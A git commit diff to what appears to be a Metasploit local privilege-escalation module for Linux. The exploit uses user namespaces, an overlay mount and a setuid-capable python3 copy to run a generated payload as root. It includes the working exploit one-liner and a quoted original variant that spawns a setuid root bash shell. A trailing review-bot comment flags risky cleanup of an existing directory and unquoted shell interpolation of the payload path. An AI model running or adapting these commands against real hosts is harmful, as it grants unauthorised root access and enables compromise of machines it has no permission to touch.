
Commit e619612

author
Corey
committed
Create dynamic payload
1 parent af91d97 commit e619612


1 file changed

+19
-8
lines changed


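--- a/modules/exploits/linux/local/game_overlay_privesc.rb
+++ b/modules/exploits/linux/local/game_overlay_privesc.rb
@@ -46,8 +46,8 @@ def initialize(info = {})
 )
 )
 register_options [
-OptString.new('PayloadDir', [true, 'Directory to store payload.', '/tmp/sysdtest/']),
-OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv.elf'])
+OptString.new('PayloadDir', [true, 'Directory to store payload.', '/tmp/main/']),
+OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv'])
 ]
 end
 
@@ -94,9 +94,9 @@ def check
 end
 
 def execute_command(_cmd, _opts = {})
-datastore['PayloadFilename']
+pay_file = datastore['PayloadFilename']
 
-datastore['PayloadDir']
+pay_dir = datastore['PayloadDir']
 
 directories = %w[l u w m].flat_map { |e| "/tmp/main/#{e}" }
 
@@ -106,17 +106,28 @@ def execute_command(_cmd, _opts = {})
 print_status "Creating directory #{dir}"
 cmd_exec "mkdir -p #{dir}"
 end
-# register_dir_for_cleanup "/tmp/main/"
 
-write_file '/tmp/main/marv', generate_payload_exe
+register_dir_for_cleanup "/tmp/main/"
+
+print_status "Creating directory to store payload: #{pay_dir}"
+pay_dir.concat "/" unless pay_dir.ends_with? "/"
+cmd_exec "mkdir -p #{pay_dir}"
+
+register_dir_for_cleanup pay_dir
+
+pay = "#{pay_dir}#{pay_file}"
+
+print_status "Writing payload: #{pay}"
+
+write_file "#{pay}", generate_payload_exe
 # works move test to low, run unshare mount set cap, shell
 
 print_status 'Starting new namespace, and running exploit...'
 
-hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0);os.system(\"chmod 4755 /tmp/main/marv && /tmp/main/marv\")' "
-
 # g1vi original
 # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
+hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' "
+
 print_status "Running exploit: '#{hack}' "
 puts cmd_exec_with_result(hack)
 end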
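Review bot: `register_dir_for_cleanup pay_dir` in the third hunk registers an operator-supplied directory for recursive removal even when it already existed before `mkdir -p`, so pointing PayloadDir at an existing path would delete unrelated content on the host under assessment at cleanup. Record whether the module created the directory, e.g. `created_dir = !directory?(pay_dir)` before the `mkdir -p`, then `register_dir_for_cleanup pay_dir if created_dir`, and track the written file separately with `register_file_for_cleanup pay`. `pay_dir.concat "/"` also appears to mutate the string handed back by `datastore['PayloadDir']` in place (working on a `.dup` avoids changing the option value), and `pay_dir` reaches `cmd_exec "mkdir -p #{pay_dir}"` unquoted, so a value containing whitespace or shell metacharacters changes the command that runs. The lines of execute_command between the second and third hunks are not visible here.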
